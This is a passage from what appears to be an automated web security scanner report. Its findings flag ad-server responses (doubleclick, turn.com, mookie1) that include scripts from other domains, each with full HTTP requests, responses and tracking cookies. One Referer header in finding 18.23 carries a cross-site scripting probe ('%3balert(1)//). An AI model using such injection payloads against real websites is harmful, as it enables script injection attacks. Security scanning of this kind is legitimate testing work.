...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;39969225&migRandom=5658295&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=39969225"></script>
...[SNIP]...

18.23. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Tribal_Fusion/B5094437.2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=1115025470? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6204

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 14 19:33:23 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.24. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=113577767?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/196247635.198101849/267856420/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856420/direct;wi.300;hi.250/01/0.9113153473008424?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:35:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4717

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.25. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.152304.TRADEDESK/B5157804.4

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 23:04:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4492

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.26. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.152304.TRADEDESK/B5157804.5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:03:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.27. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Advertising.com/B3941858.17

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5956.Advertising.com/B3941858.17;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161%5E778478%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=;ord=4382457826? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:23:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6488

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jul 16 13:50:41 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.28. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?&pub=6264177&code=14383603&cch=14381728&l=300x250&tmz=-6&area=0&res=1920&rnd=0.04441207833588123&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:55:09 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Set-Cookie: pf=Mgovx84h_Ov--Xj3--F0rsLmce8wzSDXw3BvrEZAKNiJwV9kSIzX4BtZ7vBDkFqivBHW9RKwIdLIwhhMny1M2H4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:55:09 GMT
Content-Length: 10132
var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=7951675187229449762?;click=http://r.turn.com/r/tpclick/id/Il4Z-HMGWm5UNwUAbAABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...

18.29. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?&pub=6264177&code=14383608&cch=14381728&l=728x90&tmz=-6&area=0&res=1920&rnd=0.4859149551484734&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sun, 30 Jan 2011 23:04:23 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 23:04:23 GMT
Content-Length: 10126


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
8%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...

18.30. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?&pub=6264177&code=14383608&cch=14381728&l=728x90&tmz=-6&area=0&res=1920&rnd=0.4859149551484734&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:55:09 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:55:08 GMT
Content-Length: 10126


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
8%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=3636088819337780094?;click=http://r.turn.com/r/tpclick/id/fttlMIT7dTL47AUAbwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...

18.31. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?&pub=6264177&code=14383603&cch=14381728&l=300x250&tmz=-6&area=0&res=1920&rnd=0.04441207833588123&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:03:23 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:03:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:03:23 GMT
Content-Length: 10132


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...

18.32. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90?http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543^950189^81^0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.5;abr=!ie;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1702617826/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1702617826?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.33. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2676
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/18943
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
